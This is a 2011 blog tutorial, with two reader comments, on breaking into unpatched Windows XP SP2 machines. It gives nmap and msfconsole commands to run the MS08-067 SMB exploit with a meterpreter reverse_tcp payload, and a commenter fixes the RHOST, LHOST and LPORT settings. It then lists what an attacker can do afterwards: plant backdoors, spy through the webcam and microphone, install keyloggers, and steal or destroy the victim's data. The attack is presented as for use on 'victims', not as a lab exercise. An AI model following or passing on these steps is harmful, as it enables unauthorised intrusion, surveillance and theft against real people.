Dec 1, 2011

[Tutorial] Using Metasploit: The Basic Way

I wont be going in much details here except the basic stuffs needed.
Also, this method is useful only for Windoze XP SP2, unpatched.

First make sure your target is using Windows XP and has port 445 open.

nmap -O <victim's ip>

It will show you the details of the OS your target is using.

If it is Windows XP SP2 and has port 445(smb) open, then proceed with next step.
Type these as root user.

msfconsole

Wait for about a minute or two and a console will be opened. Type these in the console in any order.

use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
use RHOST <victim's ip>
use LHOST <your ip>
exploit

If the exploit was successfull you will see a "meterpreter" shell.
If it says exploit completed but no session was created then you failed.
If you see word "meterpreter" then you succeeded.

Success means you are inside the victim's computer now, and it is fully in your control.

Now what can you do?? You can do everything in the victim's computer. Some of basic stuffs are:

1) Upload a backdoor for future use.
2) Take pictures from his webcam (if he has any).
3) Record sound form the mic.
4) Upload keyloggers, trojans etc.
5) Steal his datas.
6) Modify his datas.
7) Upload porn in his desktop. :P
8) Crash his computer.
9) And the best one is use VNC viewer to view his desktop right in your own screen and control it too. :D

If tutorials are needed on these...then post  comments. Again, I wont go in much details with screenshots and videos with these tutorials.

Have a Good Day!!

2 comments:

  1. this is great but i would like to see it in something diferent then windows xp maybe windows seven

    ReplyDelete
  2. when you are setting the RHOST and LHOST parameters of the module you should use:
    set RHOST victim's ip
    set LHOST your ip
    also it is good to set a port:
    set LPORT some port not blocked by your firewall

    ReplyDelete